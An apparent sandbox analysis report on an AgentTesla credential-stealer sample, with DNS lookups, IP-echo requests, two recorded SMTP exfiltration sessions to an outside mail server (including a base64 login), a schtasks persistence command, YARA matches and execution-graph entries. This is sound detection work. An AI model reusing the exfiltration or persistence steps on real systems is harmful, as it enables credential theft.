Nov 29, 2022 16:50:57.789524078 CET  8.8.8.8    192.168.2.6  0x2ea1    No error (0)  api.ipify.org.herokudns.com      -                            54.91.59.199    A (IP address)          IN (0x0001)  false
Nov 29, 2022 16:50:57.841023922 CET  8.8.8.8    192.168.2.6  0xa8aa    No error (0)  api.ipify.org                    api.ipify.org.herokudns.com  -               CNAME (Canonical name)  IN (0x0001)  false
Nov 29, 2022 16:50:57.841023922 CET  8.8.8.8    192.168.2.6  0xa8aa    No error (0)  api.ipify.org.herokudns.com      -                            52.20.78.240    A (IP address)          IN (0x0001)  false
Nov 29, 2022 16:50:57.841023922 CET  8.8.8.8    192.168.2.6  0xa8aa    No error (0)  api.ipify.org.herokudns.com      -                            3.232.242.170   A (IP address)          IN (0x0001)  false
Nov 29, 2022 16:50:57.841023922 CET  8.8.8.8    192.168.2.6  0xa8aa    No error (0)  api.ipify.org.herokudns.com      -                            54.91.59.199    A (IP address)          IN (0x0001)  false
Nov 29, 2022 16:50:57.841023922 CET  8.8.8.8    192.168.2.6  0xa8aa    No error (0)  api.ipify.org.herokudns.com      -                            3.220.57.224    A (IP address)          IN (0x0001)  false
Nov 29, 2022 16:51:19.724127054 CET  8.8.8.8    192.168.2.6  0xe3da    No error (0)  mail.strictfacilityservices.com  strictfacilityservices.com   -               CNAME (Canonical name)  IN (0x0001)  false
Nov 29, 2022 16:51:19.724127054 CET  8.8.8.8    192.168.2.6  0xe3da    No error (0)  strictfacilityservices.com       -                            111.118.212.38  A (IP address)          IN (0x0001)  false
Nov 29, 2022 16:51:19.876422882 CET  8.8.8.8    192.168.2.6  0xf4ba    No error (0)  mail.strictfacilityservices.com  strictfacilityservices.com   -               CNAME (Canonical name)  IN (0x0001)  false
Nov 29, 2022 16:51:19.876422882 CET  8.8.8.8    192.168.2.6  0xf4ba    No error (0)  strictfacilityservices.com       -                            111.118.212.38  A (IP address)          IN (0x0001)  false
Nov 29, 2022 16:51:46.752038956 CET  8.8.8.8    192.168.2.6  0x1df9    No error (0)  api.ipify.org                    api.ipify.org.herokudns.com  -               CNAME (Canonical name)  IN (0x0001)  false
Nov 29, 2022 16:51:46.752038956 CET  8.8.8.8    192.168.2.6  0x1df9    No error (0)  api.ipify.org.herokudns.com      -                            3.232.242.170   A (IP address)          IN (0x0001)  false
Nov 29, 2022 16:51:46.752038956 CET  8.8.8.8    192.168.2.6  0x1df9    No error (0)  api.ipify.org.herokudns.com      -                            3.220.57.224    A (IP address)          IN (0x0001)  false
Nov 29, 2022 16:51:46.752038956 CET  8.8.8.8    192.168.2.6  0x1df9    No error (0)  api.ipify.org.herokudns.com      -                            52.20.78.240    A (IP address)          IN (0x0001)  false
Nov 29, 2022 16:51:46.752038956 CET  8.8.8.8    192.168.2.6  0x1df9    No error (0)  api.ipify.org.herokudns.com      -                            54.91.59.199    A (IP address)          IN (0x0001)  false
Nov 29, 2022 16:51:46.796346903 CET  8.8.8.8    192.168.2.6  0x6660    No error (0)  api.ipify.org                    api.ipify.org.herokudns.com  -               CNAME (Canonical name)  IN (0x0001)  false
Nov 29, 2022 16:51:46.796346903 CET  8.8.8.8    192.168.2.6  0x6660    No error (0)  api.ipify.org.herokudns.com      -                            54.91.59.199    A (IP address)          IN (0x0001)  false
Nov 29, 2022 16:51:46.796346903 CET  8.8.8.8    192.168.2.6  0x6660    No error (0)  api.ipify.org.herokudns.com      -                            3.220.57.224    A (IP address)          IN (0x0001)  false
Nov 29, 2022 16:51:46.796346903 CET  8.8.8.8    192.168.2.6  0x6660    No error (0)  api.ipify.org.herokudns.com      -                            3.232.242.170   A (IP address)          IN (0x0001)  false
Nov 29, 2022 16:51:46.796346903 CET  8.8.8.8    192.168.2.6  0x6660    No error (0)  api.ipify.org.herokudns.com      -                            52.20.78.240    A (IP address)          IN (0x0001)  false
Nov 29, 2022 16:52:10.964626074 CET  8.8.8.8    192.168.2.6  0x1930    No error (0)  mail.strictfacilityservices.com  strictfacilityservices.com   -               CNAME (Canonical name)  IN (0x0001)  false
Nov 29, 2022 16:52:10.964626074 CET  8.8.8.8    192.168.2.6  0x1930    No error (0)  strictfacilityservices.com       -                            111.118.212.38  A (IP address)          IN (0x0001)  false
Nov 29, 2022 16:52:11.434695959 CET  8.8.8.8    192.168.2.6  0xd825    No error (0)  mail.strictfacilityservices.com  strictfacilityservices.com   -               CNAME (Canonical name)  IN (0x0001)  false
Nov 29, 2022 16:52:11.434695959 CET  8.8.8.8    192.168.2.6  0xd825    No error (0)  strictfacilityservices.com       -                            111.118.212.38  A (IP address)          IN (0x0001)  false
api.ipify.org

Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
0           192.168.2.6  49713        52.20.78.240    443               C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe

Timestamp                kBytes transferred  Direction  Data
2022-11-29 15:50:59 UTC  0                   OUT
    GET / HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0
    Host: api.ipify.org
    Connection: Keep-Alive
2022-11-29 15:50:59 UTC  0                   IN
    HTTP/1.1 200 OK
    Server: Cowboy
    Connection: close
    Content-Type: text/plain
    Vary: Origin
    Date: Tue, 29 Nov 2022 15:50:59 GMT
    Content-Length: 14
    Via: 1.1 vegur
2022-11-29 15:50:59 UTC  0                   IN
    Data Raw: 31 30 32 2e 31 32 39 2e 31 34 33 2e 34 39
    Data Ascii: 102.129.143.49


Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
1           192.168.2.6  49720        3.232.242.170   443               C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe

Timestamp                kBytes transferred  Direction  Data
2022-11-29 15:51:48 UTC  0                   OUT
    GET / HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0
    Host: api.ipify.org
    Connection: Keep-Alive
2022-11-29 15:51:48 UTC  0                   IN
    HTTP/1.1 200 OK
    Server: Cowboy
    Connection: close
    Content-Type: text/plain
    Vary: Origin
    Date: Tue, 29 Nov 2022 15:51:48 GMT
    Content-Length: 14
    Via: 1.1 vegur
2022-11-29 15:51:48 UTC  0                   IN
    Data Raw: 31 30 32 2e 31 32 39 2e 31 34 33 2e 34 39
    Data Ascii: 102.129.143.49

The two sessions are the same request from two processes: first the submitted sample on the Desktop, then the copy it dropped as C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe. Both use the same hard-coded Firefox 80 User-Agent, and each request is followed within about 22 to 25 seconds by an SMTP session to 111.118.212.38:587 (see the TCP table), which is the order a stealer uses when it stamps the victim's public IP into the report it is about to mail. The address returned, 102.129.143.49, is the sandbox's egress IP and reappears in the mail server's EHLO reply below. api.ipify.org itself is a legitimate service; the detection value is in the sequence (IP-echo lookup from a non-browser process, then outbound mail submission), not in the domain.


                                                  Timestamp | Source Port | Dest Port | Source IP | Dest IP | Commands
                                                  Nov 29, 2022 16:51:21.977685928 CET | 587 | 49717 | 111.118.212.38 | 192.168.2.6 | 220-bh-in-36.webhostbox.net ESMTP Exim 4.95 #2 Tue, 29 Nov 2022 15:51:21 +0000
                                                      220-We do not authorize the use of this system to transport unsolicited,
                                                      220 and/or bulk e-mail.
                                                  Nov 29, 2022 16:51:21.978070021 CET | 49717 | 587 | 192.168.2.6 | 111.118.212.38 | EHLO 302494
                                                  Nov 29, 2022 16:51:22.252252102 CET | 587 | 49717 | 111.118.212.38 | 192.168.2.6 | 250-bh-in-36.webhostbox.net Hello 302494 [102.129.143.49]
                                                      250-SIZE 52428800
                                                      250-8BITMIME
                                                      250-PIPELINING
                                                      250-PIPE_CONNECT
                                                      250-AUTH PLAIN LOGIN
                                                      250-STARTTLS
                                                      250 HELP
                                                  Nov 29, 2022 16:51:22.253521919 CET | 49717 | 587 | 192.168.2.6 | 111.118.212.38 | AUTH login YWNjb3VudHNAc3RyaWN0ZmFjaWxpdHlzZXJ2aWNlcy5jb20=
                                                  Nov 29, 2022 16:51:22.526686907 CET | 587 | 49717 | 111.118.212.38 | 192.168.2.6 | 334 UGFzc3dvcmQ6
                                                  Nov 29, 2022 16:51:23.584398985 CET | 587 | 49717 | 111.118.212.38 | 192.168.2.6 | 235 Authentication succeeded
                                                  Nov 29, 2022 16:51:23.585345030 CET | 49717 | 587 | 192.168.2.6 | 111.118.212.38 | MAIL FROM:<accounts@strictfacilityservices.com>
                                                  Nov 29, 2022 16:51:23.860614061 CET | 587 | 49717 | 111.118.212.38 | 192.168.2.6 | 250 OK
                                                  Nov 29, 2022 16:51:23.860863924 CET | 49717 | 587 | 192.168.2.6 | 111.118.212.38 | RCPT TO:<guc850155@gmail.com>
                                                  Nov 29, 2022 16:51:24.168071032 CET | 587 | 49717 | 111.118.212.38 | 192.168.2.6 | 250 Accepted
                                                  Nov 29, 2022 16:51:24.169872999 CET | 49717 | 587 | 192.168.2.6 | 111.118.212.38 | DATA
                                                  Nov 29, 2022 16:51:24.443375111 CET | 587 | 49717 | 111.118.212.38 | 192.168.2.6 | 354 Enter message, ending with "." on a line by itself
                                                  Nov 29, 2022 16:51:24.450061083 CET | 49717 | 587 | 192.168.2.6 | 111.118.212.38 | .
                                                  Nov 29, 2022 16:51:24.724167109 CET | 587 | 49717 | 111.118.212.38 | 192.168.2.6 | 250 OK id=1p02tI-0007mJ-Bj
                                                  Nov 29, 2022 16:52:14.190653086 CET | 587 | 49722 | 111.118.212.38 | 192.168.2.6 | 220-bh-in-36.webhostbox.net ESMTP Exim 4.95 #2 Tue, 29 Nov 2022 15:52:14 +0000
                                                      220-We do not authorize the use of this system to transport unsolicited,
                                                      220 and/or bulk e-mail.
                                                  Nov 29, 2022 16:52:14.194787025 CET | 49722 | 587 | 192.168.2.6 | 111.118.212.38 | EHLO 302494
                                                  Nov 29, 2022 16:52:14.473042011 CET | 587 | 49722 | 111.118.212.38 | 192.168.2.6 | 250-bh-in-36.webhostbox.net Hello 302494 [102.129.143.49]
                                                      250-SIZE 52428800
                                                      250-8BITMIME
                                                      250-PIPELINING
                                                      250-PIPE_CONNECT
                                                      250-AUTH PLAIN LOGIN
                                                      250-STARTTLS
                                                      250 HELP
                                                  Nov 29, 2022 16:52:14.499712944 CET | 49722 | 587 | 192.168.2.6 | 111.118.212.38 | AUTH login YWNjb3VudHNAc3RyaWN0ZmFjaWxpdHlzZXJ2aWNlcy5jb20=
                                                  Nov 29, 2022 16:52:14.778090954 CET | 587 | 49722 | 111.118.212.38 | 192.168.2.6 | 334 UGFzc3dvcmQ6
                                                  Nov 29, 2022 16:52:17.294580936 CET | 587 | 49722 | 111.118.212.38 | 192.168.2.6 | 235 Authentication succeeded
                                                  Nov 29, 2022 16:52:17.297631979 CET | 49722 | 587 | 192.168.2.6 | 111.118.212.38 | MAIL FROM:<accounts@strictfacilityservices.com>
                                                  Nov 29, 2022 16:52:17.575813055 CET | 587 | 49722 | 111.118.212.38 | 192.168.2.6 | 250 OK
                                                  Nov 29, 2022 16:52:17.576160908 CET | 49722 | 587 | 192.168.2.6 | 111.118.212.38 | RCPT TO:<guc850155@gmail.com>
                                                  Nov 29, 2022 16:52:17.900510073 CET | 587 | 49722 | 111.118.212.38 | 192.168.2.6 | 250 Accepted
                                                  Nov 29, 2022 16:52:17.901293039 CET | 49722 | 587 | 192.168.2.6 | 111.118.212.38 | DATA
                                                  Nov 29, 2022 16:52:18.179738045 CET | 587 | 49722 | 111.118.212.38 | 192.168.2.6 | 354 Enter message, ending with "." on a line by itself
                                                  Nov 29, 2022 16:52:18.188690901 CET | 49722 | 587 | 192.168.2.6 | 111.118.212.38 | .
                                                  Nov 29, 2022 16:52:18.467991114 CET | 587 | 49722 | 111.118.212.38 | 192.168.2.6 | 250 OK id=1p02uA-00087S-33


                                                  Target ID:0
                                                  Start time:16:50:18
                                                  Start date:29/11/2022
                                                  Path:C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe
                                                  Imagebase:0x690000
                                                  File size:847360 bytes
                                                  MD5 hash:FE1AA7FA995970EBB34465D5DC0D8CE1
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:.Net C# or VB.NET
                                                  Yara matches:
                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.325021706.0000000003D0C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000000.00000002.325021706.0000000003D0C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: Windows_Trojan_AgentTesla_d3ac2b2f, Description: unknown, Source: 00000000.00000002.325021706.0000000003D0C000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                  Reputation:low

                                                  Target ID:8
                                                  Start time:16:50:43
                                                  Start date:29/11/2022
                                                  Path:C:\Windows\SysWOW64\schtasks.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\nrQtAokXKaSn" /XML "C:\Users\user\AppData\Local\Temp\tmp152E.tmp"
                                                  Imagebase:0x210000
                                                  File size:185856 bytes
                                                  MD5 hash:15FF7D8324231381BAD48A052F85DF04
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high

                                                  Target ID:9
                                                  Start time:16:50:44
                                                  Start date:29/11/2022
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff6da640000
                                                  File size:625664 bytes
                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high

                                                  Target ID:10
                                                  Start time:16:50:44
                                                  Start date:29/11/2022
                                                  Path:C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:{path}
                                                  Imagebase:0x370000
                                                  File size:847360 bytes
                                                  MD5 hash:FE1AA7FA995970EBB34465D5DC0D8CE1
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:low

                                                  Target ID:11
                                                  Start time:16:50:44
                                                  Start date:29/11/2022
                                                  Path:C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:{path}
                                                  Imagebase:0x870000
                                                  File size:847360 bytes
                                                  MD5 hash:FE1AA7FA995970EBB34465D5DC0D8CE1
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:.Net C# or VB.NET
                                                  Yara matches:
                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000B.00000000.315331976.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 0000000B.00000000.315331976.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: Windows_Trojan_AgentTesla_d3ac2b2f, Description: unknown, Source: 0000000B.00000000.315331976.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000B.00000002.532293061.0000000002CF4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000B.00000002.531415625.0000000002CA1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                  Reputation:low

                                                  Target ID:12
                                                  Start time:16:50:45
                                                  Start date:29/11/2022
                                                  Path:C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe
                                                  Imagebase:0x5c0000
                                                  File size:847360 bytes
                                                  MD5 hash:FE1AA7FA995970EBB34465D5DC0D8CE1
                                                  Has elevated privileges:false
                                                  Has administrator privileges:false
                                                  Programmed in:.Net C# or VB.NET
                                                  Antivirus matches:
                                                  • Detection: 100%, Joe Sandbox ML
                                                  • Detection: 32%, ReversingLabs
                                                  Reputation:low

                                                  Target ID:13
                                                  Start time:16:51:31
                                                  Start date:29/11/2022
                                                  Path:C:\Windows\SysWOW64\schtasks.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\nrQtAokXKaSn" /XML "C:\Users\user\AppData\Local\Temp\tmpCC0B.tmp"
                                                  Imagebase:0x210000
                                                  File size:185856 bytes
                                                  MD5 hash:15FF7D8324231381BAD48A052F85DF04
                                                  Has elevated privileges:false
                                                  Has administrator privileges:false
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high

                                                  Target ID:14
                                                  Start time:16:51:31
                                                  Start date:29/11/2022
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff6da640000
                                                  File size:625664 bytes
                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                  Has elevated privileges:false
                                                  Has administrator privileges:false
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high

                                                  Target ID:15
                                                  Start time:16:51:32
                                                  Start date:29/11/2022
                                                  Path:C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:{path}
                                                  Imagebase:0x2e0000
                                                  File size:847360 bytes
                                                  MD5 hash:FE1AA7FA995970EBB34465D5DC0D8CE1
                                                  Has elevated privileges:false
                                                  Has administrator privileges:false
                                                  Programmed in:C, C++ or other language
                                                  Reputation:low

                                                  Target ID:16
                                                  Start time:16:51:33
                                                  Start date:29/11/2022
                                                  Path:C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:{path}
                                                  Imagebase:0x460000
                                                  File size:847360 bytes
                                                  MD5 hash:FE1AA7FA995970EBB34465D5DC0D8CE1
                                                  Has elevated privileges:false
                                                  Has administrator privileges:false
                                                  Programmed in:.Net C# or VB.NET
                                                  Yara matches:
                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000010.00000002.533369231.00000000028E4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000010.00000002.532462363.0000000002891000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                  Reputation:low


                                                    Execution Graph

                                                    Execution Coverage:12.3%
                                                    Dynamic/Decrypted Code Coverage:100%
                                                    Signature Coverage:0%
                                                    Total number of Nodes:73
                                                    Total number of Limit Nodes:4

                                                    Control-flow Graph

                                                    APIs
                                                    • GetCurrentProcess.KERNEL32 ref: 029EBBD0
                                                    • GetCurrentThread.KERNEL32 ref: 029EBC0D
                                                    • GetCurrentProcess.KERNEL32 ref: 029EBC4A
                                                    • GetCurrentThreadId.KERNEL32 ref: 029EBCA3
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.317899710.00000000029E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029E0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_29e0000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: Current$ProcessThread
                                                    • String ID:
                                                    • API String ID: 2063062207-0
                                                    • Opcode ID: 734fb04597738d37029ecdddf4e498725ebbf60ffb7a2766f71056720a133ff6
                                                    • Instruction ID: 360e3a209e4b06fe6deb3059dda4e362bb03459a1ee4395df642666dd2278aa5
                                                    • Opcode Fuzzy Hash: 734fb04597738d37029ecdddf4e498725ebbf60ffb7a2766f71056720a133ff6
                                                    • Instruction Fuzzy Hash: 045134B09043488FDB14CFA9D688B9EBBF4FB48318F24845DE40AB7250DB74A845CF65
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Control-flow Graph

                                                    APIs
                                                    • GetModuleHandleW.KERNELBASE(00000000), ref: 029E9AB6
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.317899710.00000000029E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029E0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_29e0000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: HandleModule
                                                    • String ID:
                                                    • API String ID: 4139908857-0
                                                    • Opcode ID: a78dc45383a2715310fe2754d0ac030d0f21cd3e60c58c468352a3ca24550538
                                                    • Instruction ID: 9f26b209499835d353795c547d9f5d06924bf4db63a41725d74acd62f432814c
                                                    • Opcode Fuzzy Hash: a78dc45383a2715310fe2754d0ac030d0f21cd3e60c58c468352a3ca24550538
                                                    • Instruction Fuzzy Hash: 5E713370A00B048FEB25DF6AD44079ABBF5BF88314F00892DD48ADBA50DB35E9058F91
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Control-flow Graph

                                                    APIs
                                                    • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 029EBE1F
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.317899710.00000000029E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029E0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_29e0000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: DuplicateHandle
                                                    • String ID:
                                                    • API String ID: 3793708945-0
                                                    • Opcode ID: 55ef258fe5a429346eca9566ec3a8762645761324947ebda7a143acfbaf8ff73
                                                    • Instruction ID: 105f1948692bb5d1f5bcb7c2998266eb2410f446276cd6b7c1cd8fc6923f818a
                                                    • Opcode Fuzzy Hash: 55ef258fe5a429346eca9566ec3a8762645761324947ebda7a143acfbaf8ff73
                                                    • Instruction Fuzzy Hash: 5621C2B59002499FDB10CFAAD984AEEFBF8FB48324F14841AE915A7310D374A954CFA1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Control-flow Graph

                                                    APIs
                                                    • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,029E9B31,00000800,00000000,00000000), ref: 029E9D42
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.317899710.00000000029E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029E0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_29e0000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: LibraryLoad
                                                    • String ID:
                                                    • API String ID: 1029625771-0
                                                    • Opcode ID: 84be16bb3b044913b18cccc65baa5aaa58134d9458308f41abefa515211f62a0
                                                    • Instruction ID: fa225a546f666ef661e880a8b01f6f4a6fb276dfc20e5e7ffd0515499151af09
                                                    • Opcode Fuzzy Hash: 84be16bb3b044913b18cccc65baa5aaa58134d9458308f41abefa515211f62a0
                                                    • Instruction Fuzzy Hash: FC1106B29003488FDB10CF9AD444BDEFBF8EB88314F04841EE516A7600C375A945CFA1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 195 29e9a50-29e9a90 196 29e9a98-29e9ac3 GetModuleHandleW 195->196 197 29e9a92-29e9a95 195->197 198 29e9acc-29e9ae0 196->198 199 29e9ac5-29e9acb 196->199 197->196 199->198
                                                    APIs
                                                    • GetModuleHandleW.KERNELBASE(00000000), ref: 029E9AB6
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.317899710.00000000029E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029E0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_29e0000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: HandleModule
                                                    • String ID:
                                                    • API String ID: 4139908857-0
                                                    • Opcode ID: 312aa580fd86340a465555dd9aa3c5800f6d1a5d2a7366c4bd2fc1e526bf443c
                                                    • Instruction ID: a03f1cfc1f06c1fa494f85cf99daefda6f669fc68a97ffe29cb25c228d00d699
                                                    • Opcode Fuzzy Hash: 312aa580fd86340a465555dd9aa3c5800f6d1a5d2a7366c4bd2fc1e526bf443c
                                                    • Instruction Fuzzy Hash: ED11CDB69002498BDB10CF9AD444BDEFBF8AF88228F14841AD41AB7600D375A545CFA1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.317408506.0000000000E1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E1D000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_e1d000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: aedb090caad23710ff5575ef01aa1127d293ef2aced05159573f2b6e0111d600
                                                    • Instruction ID: f2598a45ceb357c16830d772c26bb89869d5a9e22860777cf2da1a80902a2013
                                                    • Opcode Fuzzy Hash: aedb090caad23710ff5575ef01aa1127d293ef2aced05159573f2b6e0111d600
                                                    • Instruction Fuzzy Hash: AD2125B1508240DFDB05CF14DDC0BA6BF66FB98368F24856DE9066B216C336D885CBA2
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.317449566.0000000000E2D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E2D000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_e2d000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: c942e6f6f29cda583e08700ab4fe13ab0d5bcb7a635c09492180e386c4958ee5
                                                    • Instruction ID: 7777118769c537c9d19d492ebd306cf3ba8facc805f22e18675cec42ad50e85b
                                                    • Opcode Fuzzy Hash: c942e6f6f29cda583e08700ab4fe13ab0d5bcb7a635c09492180e386c4958ee5
                                                    • Instruction Fuzzy Hash: 482107B2508244EFDB05CF50E9C4B26BB65FB84318F24C56DEA09AB266C336D846CA61
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.317449566.0000000000E2D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E2D000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_e2d000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 7d1ea656592c8490535b5db0376da9bf07fc0198240307930f5e1adb0b3ed4b4
                                                    • Instruction ID: 14316e521bcb66fa417d70e9ace91c46821865bbb1aca8d871dc5fd8b1060fe8
                                                    • Opcode Fuzzy Hash: 7d1ea656592c8490535b5db0376da9bf07fc0198240307930f5e1adb0b3ed4b4
                                                    • Instruction Fuzzy Hash: 2821F571508244DFDB14CF10E9C4F26BB66FB84318F24C56DEA4A5B266C736D846CAA1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.317449566.0000000000E2D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E2D000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_e2d000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 99bf322606dd8202beed9efdd3208538a9d1f809cbce580e120c0ee7bd53a097
                                                    • Instruction ID: 915da7a34b414e78fc3b802f7642b3e219f995022c8d90223409467bb203f6a3
                                                    • Opcode Fuzzy Hash: 99bf322606dd8202beed9efdd3208538a9d1f809cbce580e120c0ee7bd53a097
                                                    • Instruction Fuzzy Hash: D721957550D3C08FCB12CF24D990B15BF71EB46314F29C5DAD9498B667C33A980ACB62
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.317408506.0000000000E1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E1D000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_e1d000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: f21b28fad4208f8a7773c4da12b744b29c369e0cd12ff14c60c0cef6af4301ee
                                                    • Instruction ID: 4cbe1e8ab5fa9c410d42e77f7c9382c60f371f6155aed0ff693f125ddf39c3b5
                                                    • Opcode Fuzzy Hash: f21b28fad4208f8a7773c4da12b744b29c369e0cd12ff14c60c0cef6af4301ee
                                                    • Instruction Fuzzy Hash: 3E11B4B6404280DFCB16CF14D9C4B56BF72FB94328F24C6A9D9055B616C336D856CBA1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.317449566.0000000000E2D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E2D000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_e2d000_SecuriteInfo.jbxd
